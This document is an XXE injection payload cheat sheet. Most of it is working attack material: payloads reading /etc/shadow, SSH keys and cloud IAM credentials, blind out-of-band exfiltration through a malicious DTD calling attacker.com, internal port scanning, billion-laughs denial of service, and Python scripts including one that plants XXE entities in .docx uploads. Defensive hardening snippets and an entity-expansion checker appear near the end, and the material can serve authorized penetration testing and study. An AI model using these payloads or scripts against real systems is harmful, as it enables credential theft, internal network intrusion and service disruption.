XXE (XML External Entity) Payloads
XXE (XML External Entity) injection abuses an XML parser that processes DOCTYPE declarations and resolves external entities found in attacker-controlled input. Depending on the parser and platform it leads to local file disclosure, SSRF (Server-Side Request Forgery) and port scanning of the internal network, denial of service through entity expansion, and, on PHP hosts with the expect extension installed, remote code execution.
Basic XXE
Simple External Entity
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test "Hello World">]>
<root>&test;</root>
External Entity from File
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
Testing for XXE
A harmless internal-entity probe. If the response contains "test", the parser expands entities declared in the DOCTYPE and the external-entity payloads above are worth trying; if the request is rejected or the DOCTYPE is stripped, DTD processing is probably disabled.
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe "test">]>
<foo>&xxe;</foo>
File Disclosure
Linux/Unix Files
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///root/.ssh/id_rsa">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/hosts">]>
<root>&xxe;</root>
Windows Files
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/boot.ini">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">]>
<root>&xxe;</root>
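The file-disclosure payloads above run end to end against the same parser in its vulnerable and its hardened configuration. This is an added example, not code from the original page: it uses Python's standard-library xml.sax on Linux or macOS, writes a constructed secret to a temporary file (standing in for /etc/passwd so it runs anywhere), and shows that one payload leaks the file when external general entities are enabled and yields nothing when they are off. The file name, the secret and the function names are all assumptions of this demo.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler
from xml.sax.handler import ContentHandler


class TextCollector(ContentHandler):
    """Gathers every piece of character data the parser reports for the document."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    @property
    def text(self):
        return "".join(self.chunks)


def build_file_disclosure_payload(target_url):
    """The classic payload: declare an external entity and reference it in the body."""
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE root [<!ENTITY xxe SYSTEM "' + target_url.encode() + b'">]>\n'
        b"<root>&xxe;</root>\n"
    )


def parse_untrusted_xml(xml_bytes, resolve_external_entities):
    """Parse like a SAX-based endpoint would and return the text content it saw.

    resolve_external_entities=True mirrors a parser left with external general
    entities enabled (the XXE-vulnerable setting); False is the hardened setting,
    which has been CPython's default since 3.7.1.
    """
    collector = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text


def demo_file_disclosure():
    """Write a constructed secret, point the payload at it, and compare both parsers."""
    secret = "db_password=hunter2\n"  # constructed sample standing in for /etc/passwd
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as f:
        f.write(secret)
        path = f.name  # absolute POSIX path, so "file://" + path is a valid file URL
    try:
        payload = build_file_disclosure_payload("file://" + path)
        leaked = parse_untrusted_xml(payload, resolve_external_entities=True)
        withheld = parse_untrusted_xml(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return {"secret": secret, "leaked": leaked, "withheld": withheld}


if __name__ == "__main__":
    result = demo_file_disclosure()
    print("vulnerable parser returned:", repr(result["leaked"]))
    print("hardened parser returned:  ", repr(result["withheld"]))
```

The hardened parser does not raise: expat simply skips the external entity, so the element is empty. That is why the internal-entity probe from the Testing for XXE section is a useful first step; it tells DTD processing apart from external entity resolution.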
PHP Wrappers
These apply when the application parses XML through PHP's libxml bindings (SimpleXML, DOMDocument). php://filter base64-encodes the file, so content containing < or & (source code, XML, binary) no longer breaks the parser; expect:// executes a command, but only if the expect extension is installed, which is rare.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "expect://id">]>
<root>&xxe;</root>
Data URI
A data: URI proves the parser resolves SYSTEM identifiers without touching the filesystem or network; the base64 payload below decodes to Hello World.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "data://text/plain;base64,SGVsbG8gV29ybGQ=">]>
<root>&xxe;</root>
Blind XXE
The application does not return the entity value in its response, so the file cannot be read directly. The techniques below either make the parser contact a server you control (out-of-band) or smuggle the data into a parser error message.
Out-of-Band (OOB) XXE
The simplest check: if the parser resolves the entity, your HTTP server (or your DNS logs, if the entity points at a unique subdomain) records a request from the target. This confirms external entity resolution but exfiltrates nothing by itself.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]>
<root>&xxe;</root>
DTD-Based Blind XXE
Malicious DTD hosted on attacker server (evil.dtd). The &#x25; inside the eval value is required: a literal % there is read as a parameter-entity reference while the value is still being declared, so "% exfiltrate" is a syntax error, whereas the character reference only becomes % when eval is expanded. The file contents end up inside a URL, so newlines or spaces in the file break the request; target a single-line file or, on PHP, use the base64 filter wrapper.
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
Payload:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
<root></root>
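The DTD-based chain above, executed locally. This is an added example rather than code from the original page: it starts a small HTTP server on 127.0.0.1 that plays attacker.com (serving evil.dtd and recording the callback), writes a constructed one-line secret as the target file, and parses the payload with Python's expat bindings configured the way a vulnerable application would be, fetching every SYSTEM identifier the parser meets. Hostnames, ports and file paths are chosen at run time, nothing leaves the machine, and the class and function names are this demo's own.

```python
import os
import tempfile
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlparse
from xml.parsers import expat


class AttackerServer(BaseHTTPRequestHandler):
    """Plays attacker.com: serves evil.dtd and records the exfiltration callback."""

    def do_GET(self):
        url = urlparse(self.path)
        if url.path == "/evil.dtd":
            body = self.server.dtd
        else:
            # Anything else is the callback; the leaked data arrives in the query string.
            self.server.received.append(parse_qs(url.query))
            body = b"<!-- received -->"  # well-formed DTD content, so the victim parser does not error
        self.send_response(200)
        self.send_header("Content-Type", "application/xml-dtd")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def make_evil_dtd(callback_base, target_url):
    """The DTD from the cheat sheet. &#x25; becomes % only when eval is expanded; a literal %
    would be read as a parameter-entity reference while the value is still being declared."""
    return (
        f'<!ENTITY % file SYSTEM "{target_url}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM \'{callback_base}/?x=%file;\'>">\n'
        "%eval;\n"
        "%exfiltrate;\n"
    ).encode()


class FetchingResolver:
    """What makes a parser vulnerable: every SYSTEM identifier is fetched and parsed.
    Entity parsers nest (evil.dtd pulls in file, then exfiltrate), so the innermost
    parser is tracked and each child parser is created from it."""

    def __init__(self, root):
        self.parsers = [root]
        self.fetched = []  # every URL the parser was made to request, in order
        self.opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore env proxies

    def __call__(self, context, base, system_id, public_id):
        self.fetched.append(system_id)
        child = self.parsers[-1].ExternalEntityParserCreate(context)
        self.parsers.append(child)
        try:
            with self.opener.open(system_id, timeout=5) as resp:
                child.Parse(resp.read(), True)  # final=True so the entity value is stored
        finally:
            self.parsers.pop()
        return 1


def parse_like_a_vulnerable_app(xml_bytes):
    """Parse with parameter-entity processing on and a resolver that fetches everything."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
    resolver = FetchingResolver(parser)
    parser.ExternalEntityRefHandler = resolver
    parser.Parse(xml_bytes, True)
    return resolver.fetched


def run_blind_xxe_demo():
    secret = "hunter2"  # constructed; one line with no spaces, so it survives inside a URL
    with tempfile.NamedTemporaryFile("w", delete=False) as f:
        f.write(secret)
        path = f.name
    server = ThreadingHTTPServer(("127.0.0.1", 0), AttackerServer)
    server.received = []
    base = f"http://127.0.0.1:{server.server_address[1]}"
    server.dtd = make_evil_dtd(base, "file://" + path)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    payload = (  # the payload from the section above, pointed at the local attacker server
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE root [<!ENTITY % xxe SYSTEM "' + base.encode() + b'/evil.dtd">%xxe;]>\n'
        b"<root></root>\n"
    )
    try:
        fetched = parse_like_a_vulnerable_app(payload)
    finally:
        server.shutdown()
        server.server_close()
        os.unlink(path)
    return {"secret": secret, "fetched": fetched, "received": server.received}


if __name__ == "__main__":
    outcome = run_blind_xxe_demo()
    print("parser fetched:", outcome["fetched"])
    print("attacker received:", outcome["received"])
```

The victim's response body is never inspected; the secret arrives at the attacker's server as the x parameter because the parser built that URL itself. Real files contain newlines and spaces, which make the callback URL invalid, so in practice the target is base64-encoded first where the platform allows it (the php://filter wrapper above).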
Error-Based Blind XXE (Data Exfiltration)
Works when the application echoes parser error messages. The error entity points at a path that cannot exist, built from the file contents, so the "no such file" error quotes the file. The same &#x25; trick as above is needed inside the eval value.
evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
Payload:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
<root></root>
SSRF via XXE
Internal Network Scanning
The parser fetches the URL with the server's own network access. The response is only reflected if it is well-formed XML or plain text free of < and & characters; otherwise the request still happens and the parse error tells you the host answered.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://192.168.1.1:80">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://localhost:8080">]>
<root>&xxe;</root>
Cloud Metadata Endpoints
An XXE request is a bare GET with no custom headers, which limits what works here: AWS IMDSv1 answers such requests, but IMDSv2 needs a session token obtained with a PUT, Google Cloud requires the Metadata-Flavor: Google header and Azure requires the Metadata: true header. Expect the GCP and Azure payloads to return an error unless the environment is misconfigured; they are listed so the endpoints are at hand.
AWS (list the role names under iam/security-credentials/ first; admin below is a placeholder for the role name that listing returns):
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
<root>&xxe;</root>
Google Cloud:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/">]>
<root>&xxe;</root>
Azure:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">]>
<root>&xxe;</root>
Port Scanning
Response time and error text differ between open, closed and filtered ports (connection refused versus a timeout, or a malformed-entity error when a non-HTTP service such as SSH answers with a banner), which is enough to map the internal network one port at a time.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://internal-server:22">]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://internal-server:3306">]>
<root>&xxe;</root>
XXE with Different Encodings
Useful when a filter searches for the literal strings <!DOCTYPE or <!ENTITY. The encoding named in the XML declaration must match the bytes actually sent: for UTF-16 the document has to be transcoded (for example with iconv -f UTF-8 -t UTF-16), not merely relabelled. Whether UTF-7 is honoured depends on the parser's encoding library; it is known to work against some Java stacks and is rejected by most others.
UTF-7
<?xml version="1.0" encoding="UTF-7"?>
+ADw-+ACE-DOCTYPE+ACA-root+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-xxe+ACA-SYSTEM+ACA-+ACI-file:///etc/passwd+ACI-+AD4-+AF0-+AD4-
+ADw-root+AD4-+ACY-xxe+ADs-+ADw-/root+AD4-
UTF-16
<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
Error-Based XXE
Trigger Errors to Exfiltrate Data
The same error-based chain with the DTD inlined. Most parsers reject this form: the XML specification forbids parameter-entity references inside markup declarations in the internal subset, so the %file; inside the eval value is a well-formedness error. It is kept for lenient parsers; against a conforming one, host the declarations in an external DTD as in the Error-Based Blind XXE section above.
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
]>
<root></root>
Advanced Techniques
Parameter Entities
The DTD is fetched from the attacker's server and can declare anything, including general entities used in the body. evil.dtd must define send (for example as an external entity pointing at a file or at the attacker's URL); otherwise the parser reports an undefined entity.
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&send;</root>
Nested Entities
Same idea with a general entity carrying the data out in a URL. As with the inlined error-based payload, the %data; reference inside an entity value is not allowed in the internal subset, so a conforming parser rejects it; move the first two declarations into an external DTD to make it work.
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/?%data;'>">
%param1;
]>
<root>&exfil;</root>
Billion Laughs Attack (DoS)
No external entity is needed: nested internal entities expand exponentially. With the nine entities below, lol9 expands to 10^8 copies of lol (about 300 MB of text from under a kilobyte of input); one more level gives the eponymous billion. Recent libxml2 and expat releases cap entity amplification, so this mainly affects old or deliberately unlimited parsers.
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
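A pre-parse check for this class of payload, added here as an example that is not part of the original page. It reads the internal DTD subset, computes how large each entity becomes when fully expanded without expanding anything, and refuses documents whose amplification is suspicious or whose entities are recursive. It covers internal general entities only, which is where entity-expansion attacks live; external entities are the parser settings' job. The regular expressions, thresholds and sample documents are this example's own choices.

```python
import re

DOCTYPE = re.compile(r"<!DOCTYPE[^\[>]*\[(.*?)\]\s*>", re.S)
# Internal general-entity declarations only: <!ENTITY name "value">. Parameter entities
# (<!ENTITY % ...>) and external ones (SYSTEM/PUBLIC) carry no inline text to expand.
ENTITY_DECL = re.compile(r"<!ENTITY\s+(?!%)(\S+)\s+(?:\"([^\"]*)\"|'([^']*)')\s*>")
ENTITY_REF = re.compile(r"&([^;\s<&]+);")
PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}


def expanded_size(name, decls, memo, active):
    """Bytes that &name; produces once every nested reference has been substituted."""
    if name.startswith("#") or name in PREDEFINED:
        return 1  # character reference or built-in entity: a single character
    if name in memo:
        return memo[name]
    if name in active:
        raise ValueError(f"entity '{name}' references itself (recursive expansion)")
    value = decls.get(name)
    if value is None:
        return 0  # undeclared, or external: nothing to expand from the DTD text
    active.add(name)
    size = last = 0
    for ref in ENTITY_REF.finditer(value):
        size += ref.start() - last + expanded_size(ref.group(1), decls, memo, active)
        last = ref.end()
    size += len(value) - last
    active.remove(name)
    memo[name] = size
    return size


def estimate_expansion(xml_text):
    """Total bytes the entity references in the document body would expand to."""
    decls, body = {}, xml_text
    m = DOCTYPE.search(xml_text)
    if m:
        decls = {name: dq or sq for name, dq, sq in ENTITY_DECL.findall(m.group(1))}
        body = xml_text[m.end():]
    memo, active = {}, set()
    expanded = sum(expanded_size(r.group(1), decls, memo, active) for r in ENTITY_REF.finditer(body))
    return {"expanded_bytes": expanded, "input_bytes": len(xml_text),
            "amplification": expanded / max(len(xml_text), 1)}


def is_safe_to_parse(xml_text, max_expanded=1_000_000, max_amplification=100):
    """Gate to run before handing untrusted XML to a real parser."""
    try:
        est = estimate_expansion(xml_text)
    except ValueError:  # recursive entities are never legitimate
        return False
    return est["expanded_bytes"] <= max_expanded and est["amplification"] <= max_amplification


# Constructed samples: the cheat sheet's payload, a harmless document, and a recursive one.
BILLION_LAUGHS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
"""
BENIGN = '<?xml version="1.0"?>\n<!DOCTYPE root [<!ENTITY test "Hello World">]>\n<root>&test;</root>\n'
RECURSIVE = '<!DOCTYPE a [<!ENTITY a "&b;"><!ENTITY b "&a;">]><a>&a;</a>'

if __name__ == "__main__":
    for label, doc in (("billion laughs", BILLION_LAUGHS), ("benign", BENIGN)):
        print(label, estimate_expansion(doc), "safe:", is_safe_to_parse(doc))
    print("recursive safe:", is_safe_to_parse(RECURSIVE))
```

The check is a gate, not a replacement for parser limits: it scans the DTD textually and ignores everything outside the internal subset, so keep the parser's own expansion limits (and DOCTYPE rejection where possible) in place behind it.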
XInclude Attack
XInclude needs no DOCTYPE, so it works when your input is embedded into a server-side XML document and you cannot control the prolog, provided the parser has XInclude processing enabled. parse="text" is required because /etc/passwd is not well-formed XML.
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
XML Injection in SOAP
The DOCTYPE must precede the root element, so it goes before soap:Envelope, not inside it; a DOCTYPE in the document body is a well-formedness error and the request is rejected before any entity is resolved.
<?xml version="1.0"?>
<!DOCTYPE soap:Envelope [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<foo>&xxe;</foo>
</soap:Body>
</soap:Envelope>
SVG File Upload
SVG is XML, so any upload that is parsed or rasterised on the server (thumbnails, previews, avatar conversion) is an XXE vector; the entity value is rendered into the text element.
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
XXE via Excel/Word Files
Excel and Word files (.xlsx, .docx) are ZIP archives containing XML parts, and servers that import them parse those parts.
- Extract the archive
- Modify an XML part (e.g., xl/workbook.xml or word/document.xml): add the DOCTYPE before the root element and reference the entity in a text node
- Repackage as ZIP, keeping [Content_Types].xml as the first entry, and rename to the original extension
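The procedure above as a script. This is an added example, not code from the original page: it builds a minimal two-part .docx in memory as a constructed stand-in for a real upload, then rewrites word/document.xml so it carries a DOCTYPE with an external entity and references it from the first text run, keeping the declaration before the root element and the archive's part order unchanged. The target system identifier and the entity name are parameters; the defaults reuse values from this page.

```python
import io
import re
import zipfile

# Constructed stand-in for an uploaded .docx: only the two parts this demo touches.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" '
    'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    "</Types>"
)
DOCUMENT = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    "<w:body><w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p></w:body></w:document>"
)


def build_minimal_docx():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", DOCUMENT)
    return buf.getvalue()


def add_xxe_to_part(xml_text, entity, system_id):
    """Insert the DOCTYPE after the XML declaration and reference the entity in the first text run."""
    decl_end = xml_text.index("?>") + 2 if xml_text.startswith("<?xml") else 0
    body = xml_text[decl_end:]
    root = re.search(r"<([A-Za-z_][\w.:-]*)", body)
    if root is None:
        raise ValueError("no root element found")
    doctype = f'\n<!DOCTYPE {root.group(1)} [<!ENTITY {entity} SYSTEM "{system_id}">]>'
    # <w:t> holds text in Word parts, <t> in Excel's sharedStrings.xml; patch the first one found.
    body, count = re.subn(r"(<(?:w:)?t\b[^>]*>).*?(</(?:w:)?t>)", rf"\g<1>&{entity};\g<2>",
                          body, count=1, flags=re.S)
    if count == 0:
        raise ValueError("no text element to carry the entity reference")
    return xml_text[:decl_end] + doctype + body


def inject_xxe(docx_bytes, part="word/document.xml", system_id="file:///etc/hostname", entity="xxe"):
    """Rewrite one XML part inside the archive and return the new .docx bytes."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():  # keep order: Office expects [Content_Types].xml first
            data = src.read(info.filename)
            if info.filename == part:
                data = add_xxe_to_part(data.decode("utf-8"), entity, system_id).encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()


def read_part(docx_bytes, part):
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.read(part).decode("utf-8")


def part_names(docx_bytes):
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.namelist()


if __name__ == "__main__":
    evil = inject_xxe(build_minimal_docx())
    print(read_part(evil, "word/document.xml"))
```

To use it on a real document, pass the uploaded file's bytes to inject_xxe and write the result back with the original extension; for an .xlsx, point part at xl/sharedStrings.xml, where cell text lives.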
Platform-Specific Payloads
Java
netdoc: is an undocumented JDK URL handler that reads local files like file: and gets past filters that only block the file: scheme. Java's file: handler also returns a directory listing when the entity points at a directory (file:///etc/), which helps enumeration.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">]>
<root>&xxe;</root>
.NET
XmlDocument in .NET Framework before 4.5.2 resolves external entities by default, and XmlTextReader does so whenever DtdProcessing is Parse and an XmlResolver is set; later versions ship with safe defaults, so this mainly affects legacy code.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>
Prevention Best Practices
- Disable DTDs entirely: reject any document with a DOCTYPE; this blocks external entities, parameter entities and entity-expansion DoS at once
- If DTDs are required: disable external general and parameter entities and do not install an entity resolver
- Use Simple Data Formats: prefer JSON where a schema is not needed
- Update XML Processors: keep parsers and the underlying libxml2/expat up to date, since recent versions ship safer defaults and expansion limits
- Validate Input: validate against an XSD or whitelist of expected structure after the parser is hardened; validation alone does not help, because the parser expands entities before validation runs
- Disable XInclude: turn off XInclude processing
- Secure Configurations:
Python (lxml; for the standard library parsers use the defusedxml package)
from lxml import etree

# resolve_entities=False stops entity substitution, no_network=True blocks fetching
# remote DTDs and entities; load_dtd defaults to False, so the DTD is not loaded either.
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse('input.xml', parser)
Java
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Strongest option: refuse any DOCTYPE. Throws on DTDs, which also stops entity-expansion DoS.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// If DTDs must be accepted, at least disable external entities, XInclude and entity expansion.
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
PHP
// Deprecated since PHP 8.0 because libxml 2.9+ disables external entity loading by default; on older stacks call it before parsing, and never pass LIBXML_NOENT to DOMDocument or simplexml.
libxml_disable_entity_loader(true);
Testing Tools
- Burp Suite - XXE detection and exploitation
- XXEinjector - Automated XXE injection tool
- OWASP ZAP - Web security scanner
- xmllint - XML validator; xmllint --noent payload.xml substitutes entities locally, useful for confirming a payload is well-formed before sending it
⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.